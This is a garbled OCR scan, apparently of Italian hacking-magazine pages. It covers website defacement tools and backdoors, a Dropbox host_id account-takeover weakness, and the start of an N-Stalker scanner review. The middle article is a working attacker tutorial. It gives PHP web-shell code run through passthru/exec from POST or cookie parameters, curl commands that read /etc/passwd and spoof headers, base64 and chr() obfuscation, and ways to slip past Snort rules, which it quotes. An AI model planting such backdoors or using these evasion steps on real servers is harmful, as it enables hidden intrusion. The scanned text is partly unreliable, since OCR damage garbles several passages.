Internet esiste tutta una serie di siti 
web che fungono da veri e propri 
archivi (peraltro molto estesi) delle 
azioni di defacement compiute: 
come riferito sopra, esiste altresì 
un’ampia comunità di defacer, i cui 
gruppi e membri sono in perenne 
concorrenza tra loro per stabilire 
chi sia in grado di craccare e 
danneggiare il maggior numero 
possibile di siti web. Tali archivi 
sono pubblicamente accessibili, 
il che significa che ogni gruppo 
di defacer può ad ogni momento 
verificare quanti “punti” esso sia 
riuscito a collezionare in classifica, 
tenendo al contempo sott'occhio 
i “successi” ottenuti dai gruppi 
rivali.I defacer non applicano 
alcun criterio di selettività nei 
confronti dei loro obiettivi; nella 
maggior parte dei casi essi si 
avvalgono semplicemente di 
tool automatizzati preposti ad 

. individuare i server vulnerabili, 
per poi sfruttare questi ultimi in 
maniera ugualmente del tutto 
“automatica”. L’exploit carica 
automaticamente sul server 
compromesso una backdoor la 
cui funzione è, ad esempio, quella 
di fornire l'accesso shell a tale 
server. Il defacer può ovviamente 
lanciare ulteriori attacchi tramite 
la suddetta backdoor, per cercare 
di aumentare i privilegi grazie 
agli exploit del kernel locale, 
o magari segnalare il server 
compromesso ad un apposito 
archivio di defacement. Simili 
backdoor vengono vendute 
anche sul mercato nero della 
cybercriminalità, consentendo 
in tal modo ai loro acquirenti di 
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INTERNET/MEDIO 


Spesso l’attività 
di defacciamento 
ha scopi 
puramente 
divulgativi 
ideologi serve 
in sostanza per 
comunicare un 
messaggio, anche 
estremo. 


poter ad esempio trasformare un 
server violato in un vero e proprio 
nodo di una rete DdoS, o magari 
di utilizzarlo in qualità di host per 
inoltrare e-mail di spam. 

Una volta che l'attacco è andato 
in porto, l'azione di defacement 
compiuta viene automaticamente 
segnalata ad un archivio online. 


GLI STRUMENTI 


| defacer si avvalgono innanzitutto 
di appositi scanner per individuare 
i server vulnerabili da sfruttare; 

una volta completato il processo 

di scansione ed identificati i 
server-vittima, i malintenzionati 
provvedono a caricare all’interno 

di questi ultimi speciali backdoor 

in grado di fornire loro preziose 
informazioni riguardo alle macchine 
infettate e di svolgere, al tempo 
stesso, la funzione di scanner 
aggiuntivi. Nella maggior parte dei 
casi, gli exploit utilizzati dai defacer 
sono pubblicamente disponibili, 
anziché essere del tipo “zero-day”. 
Per identificare i server vulnerabili i 
defacer ricorrono spesso all'utilizzo 
delle “Google Dorks”: si tratta 

di particolari query di ricerca, le 
quali possono essere ad esempio 
eseguite per ottenere determinati 
risultati riguardanti tutti i siti web 

in cui risulta attiva una specifica 
versione di una certa applicazione. 
In alcuni casi, è la backdoor stessa 
utilizzata dai defacer a generare 

il download di speciali database 
contenenti particolari Google 


Dorks, divenendo in tal mo. 
una sorta di nodo di sca 
dedicato alla ricerca di nul 
vulnerabili. 

Gli strumenti utilizzati dai 
per individuare nuovi sei 


vulnerabilità: le vulnerabilità pei 
remoti e quelle di tipo Local File 
Include. Riportiamo qui di seguito 
un elenco parziale di tali strumenti, 
che risultano peraltro essere del 
tutto gratuiti e pubblicamente 
disponibili: 


per” 


LFI intruder 

VopCrew IJO Scanner v1.2 
Single LFI vulnerabile scanner 
SCT SQL SCANNER 

Priv8 RFI SCANNER v3.0 
PITBULL RFI-LFI SCANNER 
Osirys SQL RFI LFI SCANNER 
FeeLCoMz RFI Scanner Bot v5.0 
By FaTaLisTiCz_Fx 


Come accennato in precedenza, 
una volta individuato il server 
vulnerabile, i defacer provvedono a 
generare il download di un'apposita 
backdoor all’interno di tale server. 
Le backdoor presentano una 

vasta gamma di funzionalità, ma la 
maggior parte di esse possiede dei 
metodi specifici per bypassare le 
funzioni di sicurezza PHP, rubare 
informazioni, leggere e modificare 

i file, accedere a database SQL, 
craccare password, eseguire 
comandi arbitrari e modificare i 
privilegi. Nel corso della mia ricerca 
ho rilevato oltre un centinaio di 
differenti backdoor e shell PHP; 


Le modalità di cui si avvalgono le 
backdoor per cercare di modificare 
i privilegi consistono principalmente 
nell'utilizzo di “auto-rooters” o nel 
tentativo di estrarre le password 
dai file di configurazione custoditi 
all'interno del server compromesso. 
| cosiddetti “auto-rooters” altro 
non sono che script di shell che 
provvedono a generare nel server 
inload di uno specifico 
l'exploit, composto da 


per essere eseguiti. Lo script 
di shell analizzerà in seguita la 
macchina. comprom 
determinare quali s. 


‘opera di 
‘e con suggesso i privilegi, 
à poi luogo, lifistallazione di 


no del problemi più grandi 
nel Combattere gli attacchi di 
defacement è che i defacer non 
sfruttano solamente vulnerabilità 
tecniche ma anche l'ignoranza di 
numerosi operatori. In effetti, la 
maggior parte delle persone che 
lavorano con i server web non 
comprende ancora pienamente 
l’importanza di avere un sistema 
costantemente aggiornato e dotato 
di tutte le ultime patch disponibili. 
L'installazione delle patch via 
via rilasciate dai produttori di 
software, indipendentemente 
dalla fondamentale importanza 
che essa riveste, risulta oltretutto 


un’operazione piuttosto semplice 
da eseguire; nonostante ciò, 

una delle questioni più comuni 
tutt'oggi legate alla sicurezza 
online è ancora rappresentata dal 
non mantenimento di adeguati 
standard di aggiornamento per il 
sistema informatico utilizzato. Le 
società e le organizzazioni spesso 
spendono molto tempo ed energie 
per spiegare al proprio personale 
IT come funzionano le iniezioni 
SQL ed i buffer overflow, e come 
possono essere sfruttate per un 
attacco, quando sarebbe invece 
molto più utile ed opportuno 
concentrarsi nel garantire che 

i sistemi siano completamente 
aggiornati e configurati in maniera 
appropriata. 


Un'altra questione di fondamentale 
importanza è rappresentata dal 
fatto che gli amministratori danno 
spesso per scontato che il sistema 
operativo Linux/Unix sia più 

sicuro di Windows; in tal modo, 
essi non provvedono a rafforzare 
adeguatamente le misure di 
sicurezza adottate e ad aggiornare 
le configurazioni utilizzate. 

Una corretta configurazione del 
sistema può in effetti risultare 
determinante per eliminare certi tipi 
di exploit. Ad esempio, molti degli 
exploit menzionati nel presente 
articolo sfruttano, in sostanza, 
vulnerabilità del tipo “File Include”, 
le quali consentono al defacer di 
introdurre all’interno del server 
compromesso qualsiasi tipo di 

file arbitrario; in alcuni casi tali 

file possono provenire anche da 
siti web esterni. Per proteggersi 
efficacemente nei confronti di 
simili attacchi sarebbe pertanto 
sufficiente specificare la directory 
dalla quale una determinata 
applicazione web od un sito web 
risultano autorizzati ad effettuare 
l'inclusione di file all'interno del 
server. 


Recentemente l’organizzazione 
Iranian Cyber Army ha 
“defacciato” l'home page del 
più importante motore di ricerca 
cinese, ovvero Baidu.com, che 
per inciso, supera come utenti 
di gran lunga Google. 


Il defacciamento, a scopo 
puramente dimostrativo, del sito 
delle Poste Italiane. Per fortuna 
l'intento era quello di stupire 
più che di colpire: buon per gli 
amministratori di sistema che 
hanno potuto porvi rimedio. 


Sempre l’Iranian Cyber Army 
si era preoccupato di portare, 
qualche tempo fa, un attacco a 
Twitter. 
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Me” 


di:Massimiliano Brasile 
redazione@hackerjournal.it 


COME COMPROMETTERE UN ACCOUNT DROPBOX. 


egli ultimi tempi si 

parla sempre più 

spesso di analisi 

forense, una disciplina 

che ha acquisito 

un ruolo centrale 
nelle indagini che coinvolgono 
apparati informatici. E proprio da 
questo settore provengono continui 
stimoli legati alla sicurezza dei dati 
personali, come il contributo di 
Derek Newton (derecknewton.com) 
su Dropbox. Dropbox è in questo 
momento il più popolare programma 
di sincronizzazione remota di cui 
abbiamo già parlato in passato (vedi 
HJ 192), tale da rendere necessario 
conoscere i suoi meccanismi ai fini 
di eventuali indagini: per questo 
motivo Derek ha applicato i criteri 
di analisi forense su questo tool per 
approfondirne il funzionamento. Nella 
sua analisi sono emersi degli aspetti 
interessanti legati alla possibilità 
di compromettere la sicurezza di 
un account Dropbox, che in ultima 
istanza è strettamente connessa alla 
modalità di autenticazione adottata 
“by design” (c'è poco da fare). 
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IL PUNTO DEBOLE 


Il compito principale di Dropbox è 
quello di tenere sincronizzati i file 
attraverso diversi sistemi e su diversi 
dispositivi di propria proprietà in 
modo automatico. Perché ciò sia 
possibile, è necessario: 

® Installare un client Dropbox 

* AI termine di questa installazione 
inserire le credenziali per accedere al 
servizio (o sarà richiesto di crearne di 
nuove nel caso non siano presenti) 

* Indicare quale tra le cartelle del 
proprio hard-disk si vuole dedicare 
all'attività di sincronizzazione. 


Successivamente il client funziona 

in modalità residente controllando 
continuamente la cartella dedicata 

(e le sue sottocartelle) per eventuali 
variazioni o aggiunte nei file presenti. 
A prescindere dal sistema 

operativo nel quale è installato 

il client, Dropbox durante il suo 
monitoraggio immagazzina dati di 
configurazione, l'elenco dei file e 


delle cartelle. codici di verifica (hash) 
e i dati temporanei in un insieme di 
piccoli database SQL situati nella 
cartella %APPDATA%\Dropbox 
In particolare uno di questi attira la 
nostra attenzione perché afferisce 
alla configurazione del client (config. 
db). Proviamo ad aprire questo file 
con il nostro programma preferito 
per SQL (ad esempio SQLliteman 
sotto Linux). Troveremo una tabella. 
chiamata config contenente diverse 
righe di configurazione. 


In particolare la nostra attenzione è 
attratta da alcune righe 


* Email: questo è l'indirizzo e-mail 
del proprietario dell'account che 
incredibilmente non viene utilizzato 
nel processo di autenticazione e 
può essere variato a piacimento 
(rispettando la formattazione di 

un indirizzo e-mail) senza causare 
malfunzionamenti. 


* Dropbox_path: definisce il 
percorso radice della cartella che 
sarà sincronizzata da Dropbox nel 


sistema dove è in funzione. 


* Hosi_id: è assegnato al sistema 
dopo che è stata realizzata 
l'autenticazione iniziale al termine 
dell’installazione e che non sembra 
cambiare col tempo 


Dopo alcune prove è emerso che il 
client Dropbox utilizza solamente 
host_id per autenticarsi. E qui 
nasce il problema: il file config.db è 
completamente trasportabile e non è 
in aleun modo ancorato al sistema. 
Questo significa che se qualcuno 
guadagna l’accesso al config 

db di un utente (o anche soltanto 
del valore assegnato a host_id), 
avrà la possibilità di autenticarsi e 
accedere liberamente al suo account 
fintanto che tale utente non rimuova 
l'host nel quale è stato generato 
l'host_id compromesso dall'elenco 
dei dispositivi agganciati tramite 
l'interfaccia web di Dropbox 

Per verificare questa possibilità è 
sufficiente copiare il file config.db 

in un altro sistema, accertandosi 
che dropbox_path punti a un 
percorso valido e lanciare Dropbox 
assisteremo all'immediata 
autenticazione senza alcuna 
richiesta di verifica delle credenziali 
per autorizzare l'utente e senza 
verificare che il dispositivo dal quale 
si sta accedendo sia effettivamente 
collegato e presente nella lista dei 
dispositivi collegati (anche nel caso 
in cui il sistema abbia un nome 
completamente diverso) e questo 
sembra essere il funzionamento 
previsto da progetto! Inoltre 

host_id rimane valido anche dopo 
che l'utente cambia la password 

di accesso, quindi un'eventuale 
soluzione basata sul recupero delle 
credenziali non risolve il problema. 


Ovviamente, se un attaccante ha 
accesso a config.db (nell’ipotesi 
che non sia stato inviato dall'utente 
stesso, durante un attacco di 
social engineering), vuol dire che 
ha sicuramente accesso a tutti i 
file contenuti nell'account. Questo 
significa che potrebbe essere 
sviluppato uno specifico malware 
in grado di recuperare proprio il 
config.db, o anche solo la parte 
sensibile del piccolo db e nel caso 


in cui tale malware venga rilevato 
una procedura generica di cambio 
password non impedirà comunque 
all’attaccante di accedere comunque 
all'account della vittima 

Per difendersi opportunamente 
l'utente dovrà infatti rimuovere 

via web il suo sistema da quelli 
autorizzati. Bisogna poi considerare 
che il dato di host_id è composto 

da appena 16 byte, davvero 

pochi rispetto ai gigabyte di dati 
potenzialmente riservati che possono 
essere contenuti negli account. Il che 
rende il rischio davvero elevato. 


COME 
PROTEGGERSI 


La soluzione che sembra più 
adeguata è quella di proteggere i dati 
contenuti nell'account utilizzando 
una cifratura forte, ad esempio con 
password lunghe (le cosiddette pass- 
phrase). Personalmente consiglio di 
utilizzare TrueCrypt per cifrare i dati 
di Dropbox o addirittura di realizzare 
un contenitore cifrato all'interno del 
quale installare Dropbox e la cartella 
da sincronizzare in modo da celare 
anche Dropbox dalle applicazioni 
installate. E' chiaro che questa 


soluzione non rende host_id blindato, 
ma è sicuramente più difficile 
scoprirlo. 


Ovviamente ci si deve sincerare 

di aver rimosso eventuali vecchi 
sistemi dalla lista dei dispositivi 
autorizzati, oltre che monitorare 
l’ora dell'ultima attività che compare 
nella lista Account->My Computers 
nell'interfaccia online di Dropbox. 
Se si rileva un sistema che non 
dovrebbe esserci, sarà opportuno 
scollegarlo immediatamente (unlink). 


Non nascondo che io stesso utilizzo 
Dropbox da anni e verificando ho 
trovato diversi (miei) sistemi che 
erano ancora autorizzati 

E auspicabile che Dropbox riconosca 
presto il bisogno di aggiungere 
meccanismi per aumentare le 
sicurezze e impedire che possano 
realizzarsi accessi non autorizzati 

a lungo termine negli account degli 
utenti. Molti utenti si sono lamentati, 
ma ufficialmente l’azienda risponde 
assicurando che i collegamenti SSL 
e la cifratura AES 256 nei loro server 
sono più che adeguati. Fino ad allora 
speriamo che questo articolo abbia 
allertato qualcuno e che chi utilizza 
abitualmente Dropbox si preoccupi 
di proteggere (realmente) i suoi dati 
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HACKING / WEB 


di redazione@hackerjournal.it 


IMPARIAMO COME RENDERE PIÙ DIFFICILE LA VITA A CHI 


TENTA DI INDIVIDUARCI ATTRAVERSO L’ANALISI DEI LOG 


Tipicamente un attacco informatico si compone di tre fasi. 
Nella prima, detta di Information Gathering, si parte 
con l'identificazione del target. Nella seconda, l'attacco 
vero e proprio (Exploitation), si cerca di compromette- 
re l'obiettivo ottenendo ad esempio l'accesso ad una shell 
interattiva. La terza fase è il Post Exploitation ovvero 
quando, una volta completata l'intrusione, si cerca di man- 
tenere il controllo del target il più a lungo possibile, magari 
attraverso una backdoor. Tutte queste fasi producono un 
certo livello di evidenze o disturbo nei file di log del si- 
stema target. L'obiettivo di chi attacca è invece ovviamente 
quello di non essere scoperti. Poiché l’invisibilità completa 
in un sistema è una chimera (un rootkit per quanto com- 
plesso lascia sempre delle tracce da analizzare, mentre 
una backdoor collocata in un file binario verrà sicuramente 
spazzata via al successivo aggiornamento applicativo) un 
buon compromesso raggiungibile può essere semplice- 
mente acquisire la capacità di generare il minore rumore 
di fondo possibile 


Supponiamo ad esempio di essere riusciti, sfruttando una 
vulnerabilità applicativa, ad accedere al sistema target e 
modificare uno script php esistente in modo da aggiungere 
una chiamata alla funzione pa (015 


filename: test1.php 


Prima della modifica, il normale funzionamento dello script 
era quello di ritornare al browser il messaggio “APPLICA- 
ZIONE XYZ" (Figura 1). Tuttavia con il semplice inserimen- 
to della chiamata p, hru(), se il parametro cmd viene 
popolato con un comando di sistema, questo viene esegui- 
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to e l'utente ottiene in ritorno anche il relativo output. Da 
notare l'importanza del simbolo ‘@' prima del nome del- 
la funzione che sopprime la visualizzazione degli errori a 
video. Vediamo come è possibile lanciare dei comandi a 
piacimento con curl sfruttando questa semplice backdoor: 


Figura 1 


Il risultato del comando viene riportato assieme all’output 
normalmente trasmesso dall'applicazione (il testo “APPLI- 
CAZIONE XYZ”). Osservando i log del web server (tail 
-f /var/log/httpd/access log) le precedenti ope- 
razioni hanno generato le seguenti evidenze: 


a.b.c.d - - [12/Jan/2011:14:11:31 +0100] 
“GET /testl.php?emd=cat?20/ete/pas- 
swd HITP/1.1” 200 1918 “-” “curl/7.15.5 


(x86_64-redhat-linux-gnu) libcurl/7.15.5 
‘OpenSSL/0,9.8b zlib/1.2.3 libidn/0.6.5” 


l'amministratore di sistema può in pratica facilmente indi- 
Viduaré a presenza di un parametro sconosciuto e quale 
comando è stato eseguito (es, cmd=id) riconducendolo 
immediatamente alla scoperta della backdoor. Dal punto di 
vista delllattacker occorre chiaramente prendere dei prov- 
vedimentiiper mascherare meglio l'utilizzo della backdoor. 
Un maggiore li di occultamento lo si potrebbe raggiun- 
gere utilizzando i metodo HTTP POST invece di GET: 


filename: test2.php 

<?php 

echo “<p>APPLICAZIONE %YZ</p>"; 
@passthru($_POST[‘cmd'}); 


> 


Con questa madifica non è più possibile passare il coman- 
do da eseguire direttamente nella query string. Il parametro 
cmd ed il relativo comando andranno invece forniti utilizzan- 
do un'apposita struttura application/x-www-form-ur- 
lencodedì. Con curl il solo onere aggiuntivo rispetto all'e- 
sempio precedente consiste nel fare uso dell'opzione —d: 


$ curl http://ip_server /test2.php -d 
“emd=id” 

oi 

uid=48(apache) gid=48(apache) 
groups=48 (apache) 


Questa volta la traccia lasciata nei file di log è la seguente: 


a.b.c.d - - [12/Jan/2011:15:34:27 +0100] 
“POST /test2.php HTTP/1.1” 200 105 “-" 
“curl/7.15.5 (x86_64-redhat-linux-gnu) 
libcur1/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 
libidn/0.6.5” 


Il risultato ottenuto dall’attacker è che gli argomenti tra- 
smessi con POST non sono stati loggati, ovvero dai log 
del web server non è possibile individuare il comando tra- 
smesso. Tuttavia la presenza di un User Agent non stan- 
dard, così come l'assenza di un Referer, potrebbero anco- 
ra insospettire l'amministratore di sistema. Fortunatamente 
entrambe le informazioni sono facilmente falsificabili lato 
client. Volendo rimanere fedeli alla serie di esempi fatti con 
curl, le opzioni da linea di comando da impiegare sono -A 
per impostare l'User Agente e —e per specificare il Referer: 


$ curl http://ip_server /test2.php -d 
“emd=id” -A “Mozilla/5.0 (Windows; 

U; Windows NT 6.1; it; rv:1.9.2.13) 
Gecko/20101203 Firefox/3.6.13" -e “http:// 
ip_server/" 


Nei log è adesso apprezzabile la seguente evidenza: 


a.b.c.d - - [12/Jan/2011:16:03:01 +0100] 
"POST /test2.php HTTP/1.1” 200 105 
“ittp://ip server/” “Mozilla/5.0 (Win- 
dows; U; Windows NT 6.1; it; rv:1.9.2.13) 


Gecko/20101203 Firefox/3.6.13”" 


Supponiamo invece che la modalità comune utilizzata dai 
client legittimi per accedere all'applicazione (o comunque 
allo script php) in cui è stata inserita la backdoor sia tra- 
mite GET. Un numero elevato di POST verso questa pa- 
gina potrebbe chiaramente insospettire l'amministratore di 
sistema. La domanda da porsi a questo punto è: esiste un 
modo per continuare ad invocare una pagina utilizzando il 
metodo GET ma evitando che gli argomenti siano loggati? 
La risposta è affermativa. Immaginate infatti una modifica 
di questo tipo: 


filename: test3.php 

<?php 

@cho “<p>APPLICAZIONE XYZ</p>"; 
@passthru($..COOKIE['cmd']); 

> 


Il comando da far eseguire al server in questo caso viene 
passato tramite cookie. Per quel che riguarda curl, solle- 
citare la backdoor comporta unicamente l'impiego del flag 
— da linea di comando: 


$ curl http://ip server /test3.php -b 
‘emd=id” -A “Mozilla/5.0 (Windows; 

U; Windows NT 6.1; it; rv:1.9.2.13) 
Gecko/20101203 Firefox/3.6.13” 


E questa è la traccia lasciata nei log: 


a.b.c.d - -[12/Jan/2011:16:12:27 +0100] 
“GET /test3.php HTTP/1.1” 200 105 “-" “Mo- 
zilla/5.0 (Windows; U; Windows NT 6.1; it; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13” 


Apparentemente sembra che abbiamo raggiunto un buon 
livello di occultamento. Il metodo con cui lo script viene in- 
vocato è GET e nessun parametro è loggato. Ma proviamo 
a confrontare questa evidenza con la traccia lasciata nei 
log da un client legittimo: 


ip client - - [12/Jan/2011:12:37:11 +0100] 
“GET /test3.php HTTP/1.1" 200 24 “-" “Mo- 

zilla/5.0 (Windows; U; Windows NT 6.1; it; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13" 


Ciò che si evince è che la richiesta regolare di un client ver- 
so questa pagina produce una risposta di 24 byte, mentre 
quando viene attivata la backdoor, la dimensione dei byte ri- 
tornati varia in funzione dell'output prodotto in risposta al co- 
mando trasmesso. Questo in un certo qual senso potrebbe 


diventare un segnale di allarme agli occhi di un amministra- 
tore di sistema attento. A seconda di come è configurato 
il web server in cui risiede la backdoor si può comunque 
raggiungere un livello di occultamento ancora maggiore. 
Volendo proporre un esempio concreto, per testare gli 
script di questo articolo, in redazione abbiamo utilizzato la 
versione di default di Apache fornita con CentOS 5.5. In 
questa distribuzione la direttiva LogFormat del file di confi- 
gurazione del web server viene così definita: 


LogFormat “%h %1 tu 3%t \"tr\" î>s tb \"3{Re- 
ferer}i\" \"3{User-Agent}i\"" combine 


Dal manuale di Apache si apprende che %b rappresenta 
la dimensione in byte dei dati ritornati al client, esclusi gli 
header HTTP. Ciò significa che se facciamo in modo che 
la backdoor ritorni, come parte degli header HTTP, l'ou- 
tput del comando che le è stato chiesto di eseguire, sia la 
richiesta proveniente da un client lecito che quella prove- 
niente dall’attacker lasceranno nei file di log esattamente le 
stesse evidenze. Ecco un esempio concreto: 


filename: test4.php 

<?php 
@header(“Header-XXX:".dexec($_ 
COOKIE[ ‘cmd’))); 

echo “<p>APPLICAZIONE XYZ</p>"; 
» 


Osserviamo cosa accade invocando il nuovo script con 
curl. In questo caso per vedere l'output del comando tra- 
smesso utilizziamo l'opzione -v (verbose): 


$ curl http://ip server/test4.php -b 
“emd=id” -A “Mozilla/5.0 (Windows; 
U; Windows NT 6.1; it; rv:1.9.2.13) 
Gecko/20101203 Firefox/3.6.137 —v 


HTTP/1.1 200 OK 

Date: Thu, 13 Jan 2011 14:50:48 GMT 
Server: Apache/2.2.3 (CentOS) 

ici 

Header-XXX: uid=48(apache) gid=48(apache) 
groups=48 (apache) 

Le] 

<p>APPLICAZIONE XYZ</p> 


Comevolevasidimostrarel'outputdelcomandoidvieneripor- 
tato dentro Header-XXX. Edeccolatraccialasciata nei log: 


ip_client - - [13/Jan/2011:12:37:11 +0100] 
“GET /test4.php HTTP/1.1” 200 24 “-" “Mo- 

zilla/5.0 (Windows; U; Windows NT 6.1; it; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13" 


perfettamente uguale a quella lasciata da un client legit- 
timo. L'occultamento nei file di log a questo punto si può 
considerare completo. Ma cosa succede se tra l'attacker 


ed il web server target è installato un Network..Intru- 
sion Detection System (NIDS)? Per fornire una risposta 
esaustiva 


basta dare una rapida occhiata ad alcune delle regole 
caricate di default da Snort, certamente il software open 
source di Intrusion Detection/Prevention più conosciuto 
al mondo. Dal file attack-responses.rules: 


alert ip any any -> any any 
(msg: "ATTACK-RESPONSES id check retur- 
ned root”; content: ”uid=0|28|root|29]|"; 
metadata:policy balanced-ips drop, policy 
security-ips drop; classtype:bad-unknow; 


sid:498; rev:7;) 


alert ip $HOME NET any -> SEXTERNAL_NET any 
(nsg:”ATTACK-RESPONSES id check returned 
userid”; content:"uid="; nocase; content:” 
gid="; distance:0; pcre:”/uid=\d{1,5}\S+\ 
stgid=\d{1,5}/smi"; classtype:bad-unknow; 
sid:1882; rev:14;) 


Si tratta di alcuni esempi rappresentativi di regole che 
analizzano il traffico di rete alla ricerca di contenuti che 
diano evidenza di un problema di sicurezza. In entrambi i 
casi le regole segnalano un'anomalia se viene ricostruita 
una sessione dati riconducibile all'output del comando 
“id”. Il perché dell'esistenza di queste regole è dovuto 
al fatto che originariamente gli exploit old-school (quelli 
che per inteso sfruttavano una vulnerabilità su un de- 
mone di rete e non un banale XSS su un'applicazione 
web) dopo aver eseguito un bind o reverse shellcode, 
lanciavano in automatico “i a" come primo comando del- 
la sessione prima di accettare ulteriori comandi dall'at- 
tacker. Nel corso degli anni quindi l'output del comando 
“id” trasmesso da un sistema della rete interna verso 
Internet, è chiaramente divenuto un probabile segnale di 
intrusione da rilevare. 


A tal proposito, nella configurazione di un IDS, sono so- 
litamente presenti numerose regole che rivelano anche 
la probabile interazione di un attacker con una shell, in- 
tercettando il banner del prompt dei comandi trasmesso 
su porte non comuni di una sessione TCP. Eccone un 
esempio: 


alert top $HOME NET 121:23 -> SEXTERNAL NET 
any (msg:”ATTACK-RESPONSES Microsoft cmd.exe 
banner”; flow:established; content: "Microsoft 
Windows”; content:”|28|c]29] copyright 1985- 
"; distance:0; content: “Microsoft Corp."; 
distance:0; metadata:policy balanced-ips 
drop, policy connectivity-ips drop, policy 
security-ips drop; reference:nessus,11633; 
classtype:successful-admin; sid:2123; 
rev:4;) 


Ai fini della nostra discussione è evidente quindi che tra- 
smettere in chiaro testo l'output riportato dalla backdoor 
non rappresenta la migliore tecnica di occultamento che pos- 
siamo mettere in campo ma, con un semplice accorgimento, 
possiamo eludere potenzialmente anche i controlli di Snort. Ad 
sempio‘si può pensare ad una madifica di questo tipo: 


filename: test5.php 


1#(18S6t/(8 COOKIE)) @header("Header-XXX:".@ 
encode(@exec($_COOKIE[‘cmd']))); 
PLICAZIONE XYZ</p>"; 


3 Na, 


it 

In questo caso il — comando eseguito dalla backdoor vie- 
he inserito: nell'header fittizio piece ma restituito 
codificato in base64: 


$ curl http://ip. 
d=id” -A “Mozilla/5.0 (Windows; 

U; Windows NT 6.1; it;\xzw:1.9.2.13) 

Gecko/20101203 Firefox/3.6.13" —v 


HTTP/1.1 200 OK 
[.] 
Header-XXX: dW1kPTOAKGFwYWNOZ [..} 


Per decodificarlo al volo possiamo avvalerci. dell'utility 
base64 che su CentOS fa parte del pacchetto coreutils: 


$ echo dWIKPT[..] | base64 -d 
uid=48(apache) gid=48(apache) 
groups=48 (apache) 


In generale per rimanere nascosti agli occhi di un IDS la 
codifica base64 può essere sufficiente ma, ovviamente, 
‘aggiungere un ulteriore layer di compressione dei dati o 
cifratura con algoritmo crittografico simmetrico, può offrire 
livelli di occultamento superiori. 


Conclusione 


Prima di concludere sono doverose alcune considerazioni. 
Anzitutto modificare i sorgenti di un sito per introdurre una 
backdoor è un'attività che può essere facilmente identificata 
da un HIDS (Host Intrusion Detection System) come tripwi- 
re o Samhain. Nella realtà però gli amministratori di sistema 
odiano utilizzare questi strumenti per monitorare le directory 
che possono contenere file in continua evoluzione come log 
o appunto pagine html, script php, etc... pertanto l’attacker ha 
sempre una buona chance di rimanere nascosto. 


Nel tentativo di rendere un po' più difficile l'individuazione del- 
la backdoor e facendo seguito ad un trend affermato da anni, 
soprattutto nello sfruttamento di vulnerabilità che colpiscono i 
browser e che utilizzano Javascript come vettore di attacco, 
si può cercare di mascherare il codice o le funzioni invocate 
in modo da sostituire i caratteri ASCII con la relativa codifica 
numerica, utilizzando chr () come sotto mostrato: 


filename: test6.ph 
<?php 


echo “<p>APPLICAZIONE XYZ</p>"; 

//$a = ‘@passthru’ 
$a='@p'.chr(112).chr(97)-chr(115).chr(115). 
chr(116).chr(104).'ru'; 

$a($_POST[‘cmd']); 

> 


Infine è opinione di alcuni esperti (ed anche della nuova re- 
dazione di Hacker Journal) che il modo migliore per impa- 
rare l'arte dello stealthing (o perlomeno per raggiungere 
un buon livello di occultamento) sia di installare un NIDS 
come Snort nella propria rete ed osservare il suo compor- 
tamento. Questo può risultare un modo perfetto per impa- 
rare a capire il tipo di disturbo o di evidenza prodotti nei log 
di un IDS dopo ogni singola azione compiuta in rete. 


Good Hacking! 
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"azione di qualsiasi 
hacker è preceduta da 
una fase di analisi del 
proprio obiettivo. Un 
po’ come avviene in 
una partita di calcio, dove una 
squadra rileva i punti deboli 
dell’altra, anche nel campo 
della sicurezza informatica 
c'è bisogno di verificare dove 
si può agire. E questo, sul 
versante opposto, è quanto 
dovrebbe fare chi tiene sotto 
controllo la sicurezza di un 
sito. Il secondo, tuttavia, non 
è sempre mosso dalla voglia 
di conoscenza del primo, e 
preferisce rivolgersi a software 
belli e pronti che svolgano 
il lavoro sporco in completa 
autonomia (o quasi). Si tratta 
di programmi molto costosi e, 
nella maggior parte dei casi, 
chiusi. E a volte pure capaci 
di violare l'etica hacker, anche 
se questo non significa che 
non possano tornare utili 
proprio... agli hacker. Tra questi 
c’è N-Stalker, web-scanner 
che non ha certo bisogno 
di presentazioni e che, forte 
di un'interfaccia gradevole, 
dispone di un discreto 
armamentario di funzioni in 
grado di rilevare le più recenti 
vulnerabilità dei web-server. 
Noto anche per un prezzo 
tutt'altro che abbordabile 
(si parte da circa 270 €), da 
qualche tempo N-Stalker 
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MONITORING 
E CHISL'HA 
DETTO CHE 
TROVARE 
FALLE NEI WEB- 


SERVER SIA UNA 


PROCEDURA 
LUNGA E_ 
NDIOSA? 


LIL 


Alcuni degli strumenti 
a disposizione di I 
N-Stalker. Come i 
possiamo vedere, non 


è disponibile anche in una 
versione totalmente gratuita. 
Ovviamente c’è qualche 
limitazione rispetto alle edizioni 
commerciali, ma la dotazione di 
base val bene una prova. 


INSTALLAZIONE 
IN POCHI CLIC 


N-Stalker Free Edition è 
disponibile all'indirizzo nstalker. 
com/products/free. Una volta 
qui, si clicca in basso a sinistra, 
su Click to download Free 
Version, e si compila il modulo 
online. Nessuno ci obbliga x 
a inserire dei dati veri, ma 

l'indirizzo di posta elettronica | # 
deve essere quanto meno k 
“raggiungibile”. Infine si clicca 
su Send e si va all'indirizzo 
e-mail specificato, dove si 
trova il link da cui scaricare 


La stato delle analisi 
è monitorato in tempo 
reale e con dovizia di 
particolari. 


Al 
ba 


l'applicazione, che sta in un 
file di circa 13 MB. Effettuato il 
download, non resta che fare 
doppio clic sul file e procedere 
con la semplice installazione, e 
avviare N-Stalker Free Edition. 
All'avvio, il programma si 
occupa di verificare la presenza 
di aggiornamenti (se disponibili 
è bene installarli subito) e, in 
capo a pochi istanti, ci mette 
di fronte alla sua interfaccia 
principale. 

Utilizzare questo software 

è molto semplice, se non 
abbiamo particolari esigenze: 
digitiamo l’indirizzo del web- 
server da controllare, nella 
finestrella centrale, e poi 
utilizziamo il menu a tendina, 
che si trova in parte, per 
selezionare il tipo di controllo. 
Ce ne sono cinque diversi, 
ciascuno preposto a un’analisi 
specifica. Una volta selezionato 
questo parametro, non ci resta 
che cliccare su Start Scan 
Wizard. Si avvia uno wizard, 
cioè una procedura guidata 
alla scansione del sito. Nella 
prima finestra possiamo 
‘caricare i parametri di una 
scansione precedente o di uno 
spider, oppure passare oltre, 
cliccando direttamente su Next. 


i A questo punto la finestra di 


ottimizzazione, Optimizing 
Settings, consente un'ultima 
ottimizzazione del processo di 
analisi, effettuabile cliccando 
su Optimize. In questo caso, 
N-Stalker esegue una serie di 
test per modificare al meglio i 
parametri di controllo. Anche 
a basso livello, cliccando su 
Scan Settings. Quando tutti 

i parametri sono configurati, 
clicchiamo su Next, rivediamo 
